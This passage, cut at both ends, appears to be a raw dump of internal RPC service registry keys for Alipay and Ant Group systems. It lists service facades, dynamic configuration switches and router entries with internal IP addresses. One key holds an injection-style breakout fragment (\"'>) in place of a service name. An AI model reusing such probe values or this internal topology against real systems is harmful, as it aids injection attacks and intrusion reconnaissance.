alipay.openeco.facade.stresstestmng.bizservice.AgentManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.familycore.facade.FamilyArchiveFieldFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.equitypublishcore.common.service.facade.EquityProjectFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqueue.client.domainA0#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zpaas:name=com.alipay.routeclient.DefaultRouteCoordinator.rpcRouteByGroupWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.184.211#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.paydecision.service.api.PayFundDecisionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:distinguishprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iriskmerchant.common.service.facade.merchant.MerchantEntryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:fccfpcenter_judicialProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.finorm.biz.facade.api.FileTemplateServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.superapi.common.core.client.AppInvokeService:1.0:dwalm@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.memberprod.common.custcptrule.RegisterRuleConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcredittrans.facade.api.PcreditAccountTransFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cashier:name=com.alipay.cashier.common.service.integration.drm.resource.AntEventContextResource.jieBeiCfg,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.appstore.common.service.facade.commodity.CommodityCategoryQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_S_HERA#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fundselling.common.service.productx.facade.AssetCashingAdviseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antfin.blockchain.mypointsblock.service.integration.BasementIntegrationService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.76.77#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchstoreapp.store.facade.api.StoreEntranceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dwsap.common.service.facade.subscribe.MailSendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cdp.common.spi.creative.service.CdpSpiService:1.0:finfocore@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.logrotator-app-hour-custom_hourdelimiter:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.globalOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:EC_IRECON2_FEE_BILL_ACCOUNTING@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.mrchcommons.base.facade.tag.MerchantUserTagFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finorm.core.service.guardian.TrServiceCoreService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcomment.rpc.TopicH5Rpc:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcomment.rpc.MyInOutBoxMsgH5Rpc:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.Arch:name=com.alipay.tradeexprod.service.integration.drm.resource.SwitchToUtpResource.masterController,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antforest.common.service.facade.UserCertificateService:1.0:antforest@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_IFCCARDCENTER#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.afwrobottwa:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.debug,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.promomng.core.model.antworkbench.repository.AntDatabusFlowConfigRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.dtqualitycore.drm.DataqualityConfigDrm.dataqualityOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.developerops.facade.api.MessageQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mychain.gov.common.facade.tdm.api.TdmAuthFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.xview.core.common.facade.CallbackService:1.0:xview@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.batchfund.common.service.facade.alloc.api.AllocRuleBatchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.aip.fixedmigrate.FixedMigrateConfigDrm.fpaMigratingBlackUserIds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.20.146.77#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.gfinvest.facade.api.cust.customtag.CustCustomTagFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.astaralarm.common.service.facade.tvm.TvmTagManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditschedule.service.facade.spi.ExecuteService:1.0:pcreditagreement.cifAgCorrectTask@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ialicore.common.igdmcclient.spi.GlobalDataSyncCallbackSpi:1.0:iexratecenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.64.208#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cfpcenter.common.service.facade.specialbusiness.api.CfpSpecialFreezeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.smartsql.service.facade.blink.controller.BlinkBrsProxyController#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.antgroup.zmxy.zmbizauth.common.service.facade.api.BizAuthFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.apfasmng.common.service.facade.aigsettings.AigSettingsFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.erecon.common.service.facade.config.ErcQueryConfigRuleService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.merchantsettle.service.common.facade.McSettleFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.platform.schedule.concurrent.execute.DataExecuteDriver:1.0:findataprodDataExecuteDriver@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.couponcore.common.service.facade.CouponRuleFacadeAtGzone:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.25.234.197#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.antgroup.zmxy.zmservicehub.common.service.facade.paydecision.InstPayDecisionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.charge.common.dal.conf.impl.ChargeNewDRMConfigureImpl.productMsgSwitchConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.giftprod.common.service.facade.inner.GiftCrowdGzQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:antmember@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@cdp#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.antcloud.infrastructure.facade.environment.EnvironmentExplorer:1.0:SERVICERESOURCE@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchasset.common.service.facade.common.AssetItemQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.biz.consultant.drm.ClaimCommonDRMClient.userTouchSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.appxcore.common.service.facade.api.material.UnionMaterialConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbitemprod.biz.service.webspi.controller.KbItemVerificationWrapperService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocenter.facade.api.venue.VenueStrategyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.budgetcore.core.model.manage.SubManageOrderRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cfpcenter.emc.common.service.facade.api.EmcKhzjBoardQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agdscs.common.service.facade.housefund.HouseFundQuotaFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acoffercenter.common.service.facade.offer.OfferConfigManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.152.115#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.securitycore.biz.policy.simulator.SecuritySimulatorService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.airbops:name=com.alipay.routeclient.DefaultRouteCoordinator.grayEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.secucns.common.service.facade.SyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.facade.reachshop.AmapShopAuditingQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:definfinance@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.common.service.facade.api.gateway.GatewayFacade:1.0:opensupport_onstopmng_industryInfoService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pricecenter.common.service.facade.api.price.PriceQueryStdFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.aciamcore.common.service.facade.identity.TenantServiceFacade:1.0:fxw@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapires.facade.api.SdkManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finvirtualta.core.service.yeb.manager.UserLoanAccountIncomeManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.manager.AppResourceManager:1.0:antacl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileorderprod.service.api.mng.UserTagFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inspectcore.common.service.facade.execute.ExecuteFinishListener:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiswisdom.compute.common.service.facade.api.eventcompute.EventComputeOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fincommontaskhub.service.facade.schedule.TaskhubSofaScheduler:1.0:finscenemng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.yeb.YebContractService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.speech.api.reply.ReplyFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.findatacanal.common.service.manage.PlateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifcommon.business.platform.genericmerchant.facade.EquipmentAuthQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.gfas:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInBizValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.55.96.26#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:icertifycore_callback_dispatcher@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.voucherfront.common.service.facade.api.template.TemplateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.231.213#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alibaba.buc.acl.api.service.AppService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finorm.biz.facade.api.RiskScopeSettingFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fundprod:name=com.alipay.fc.prodwealth.Config.openLocalCache,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.agdsroalipay.facade.configtable.ConfigTableQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.FundBankFileService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.mif.common.service.facade.MerchantCardFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iamlmng.biz.report.shared.service.ReportService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.apshopcenterTairCache.zonePolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.publiccore.common.service.facade.app.PublicAppSecurityFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secuinfos.common.service.facade.api.EtlConceptualFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dss.endpoint.plugin.openapi.MonitorOpenApiFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fininfo.common.service.facade.info.InfoSystemInvokeRService:1.0:bizfund@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.custview.facade.IdMappingQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.oyz.core.facade.api.FieldFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assettrans.facade.faasset.api.FaAssetInfoQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.merchant.facade.api.MerchantStoreFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antcloud.timeline.facade.OperationLogFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zproxy.default#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.yqcore.common.service.facade.api.BusinessTokenFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:chairsffdemo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.etetestcore:name=com.alipay.routeclient.DefaultRouteCoordinator.grayEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilecsa.common.service.facade.MenuSloganService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.scenecustom.api.SceneCustomFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:grsettle@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yfdmodel.facade.DomainModelApi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mmportal:name=com.alipay.dwebupload.client.drm.DomainConfig.uploadTarget,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_INSLEADS#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.ipciTairCache.zonePolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cstraining.common.service.facade.training.api.CstTrainingQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.qconsole.facade.mq.MQTopicRestFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.cloudprovision:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInBizValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.ipciConfigTairCache.compressionType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fppolicy.service.standard.StandardProcessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:sendMerchantConfirmExcutor@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiscore.common.service.facade.operation.comment.CommentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientSyncServiceFacade:1.0:graycore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:\"'>@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.184.77#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.gmcore:name=com.alipay.cif.drm.PasswordRevokeSwitch.simplePasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.iotcore.spi.RpcSpi:1.0:mrchstm@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cifin:name=com.alipay.cif.client.drm.bankcardtaircache.CifQueryLocalCacheSwitcher.localcacheProvider,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.acticketcore.common.service.facade.UserGroupFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.openhome:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcTimeDelayed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.insttrade:name=com.alipay.common.tracer.manage.TracerDrm.zdalOcsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.nodejs.ConsumerService:1.0:basement@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iprobe.patrol.BillFilePatrolService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mitemcenter.common.service.facade.backend.api.BackendItemShopRelationFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:zeus@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.datacontextlib.heraconfigmanager.HeraPublishFacade:1.0:zdataquery@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.adcenter.common.service.facade.drill.service.AdcFaultInjectFacade:1.0:adcFaultInjectFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finscprod.facade.analysis.DiagnosisFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordercore.common.service.facade.protocol.ProtocolQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.oceanbase.obforumcore.service.doc.DocFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.agent.AgentOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.razor.datasource.RazorDataSourceService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acoffercenter.common.service.facade.offer.SolutionPackageManageFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sofa.rpc.elastic.ElasticService:1.0:userpsycore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ordermng:name=com.alipay.grayprod.change.drm.ChangePolicy.phaseExecutePolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.cardcenter.facade.SessionQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acticketmng.common.service.facade.api.manage.AppManageFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.finfundtrade:name=com.alipay.finfundtrade.common.service.facade.drm.RefundDailyCutDrmConfig.zfbPayDailyCutTime,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superapi.client.SystemAppInvokeService:1.0:voucherprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiswisdom.common.service.facade.api.job.JobDefineQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.developerops.facade.api.MessageFieldSendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insserviceprod.facade.InsSerAttachmentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.pointmng.core.service.drm.CouponTemplateControlResource.displayAllowRecycleExpireBudget,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.customerTairCache.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.acoffercenter.common.service.facade.open.offer.OfferSaleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dasbi.daas.api.query.metric.MetricInsightFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_G_MAIL#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.fcbuservice.common.service.facade.manager.LocaleMsgManager:1.0:antzhixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:gfinstweb@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:pcreditprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.ctokenCheckerEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.inshealthclaimmng.publicity.facade.PublicityRecoverFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpwm.facade.share.FinFundQueryWithCacheFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.105.173#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.insopenprod.common.service.facade.api.kbmerchant.KBMerchantServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileappcommon.common.service.facade.baas.CommonGreyResourceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.159.144#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:iprofile@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.accrmcore.common.service.facade.ChannelOperatorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rule.common.base.service.ScriptValidateService:1.0:MODEAUTOSWITCH@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kgmng.core.service.project.ProjectEntityService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:app-jsonp-default@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insinformcore.common.service.facade.std.api.config.CrowdConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.0.188#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.secucommunity.open.facade.EntityCommonOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imerchantsettle.common.service.facade.api.DistributeFundService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.consumeprod.common.service.facade.ConsumeOverviewRzoneService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkdepmng_addL3CustomerCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insscenemarket.common.facade.InsMktCommonFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicenter.common.service.facade.api.template.MiniAppInstantiateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.190.67#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.bizinsight.common.service.facade.crowd.ProfileAuthFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fraudmng:name=com.alipay.cif.model.cache.CifCOControlSwitch.readCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.idpatrol.common.service.facade.api.InspectAbilityService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.atd:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.globalBlackListValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.aciamcore:name=cn.com.antcloud.common.auth.client.config.AntPersonalDrmConfigTrigger.errorMessageZH,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openitemcore.common.service.facade.api.management.tag.TagWorkFlowFacade:1.0:APPXCORE@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.datacaptain.service.facade.DatacaptainJobManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.riskmng.core.service.drm.impl.ComplainConclusionSwitchImpl.conclusionLabelConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.jiuzhou.client.spi.PaasActionDispatcher:1.0:izauth@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkdepmng_Common_Cancel_CallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbordersync.common.service.facade.spi.OrderPullProcessCallBack:1.0:mappprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.addpLoadtestTairRz.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.mif.common.service.facade.MerchantShopGzonePageQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ipay.data.ifdasset.facade.UniQueryDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insofflineinvest.common.service.facade.service.GeoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cifin:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.switcher,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cicada.bizlogicide.common.service.facade.api.BizLogicServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.airprod.common.service.facade.airdut.AirDutThirdPnrServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.153.87#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.agdscc.common.service.facade.service.AgdsCreditCenterInitializeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_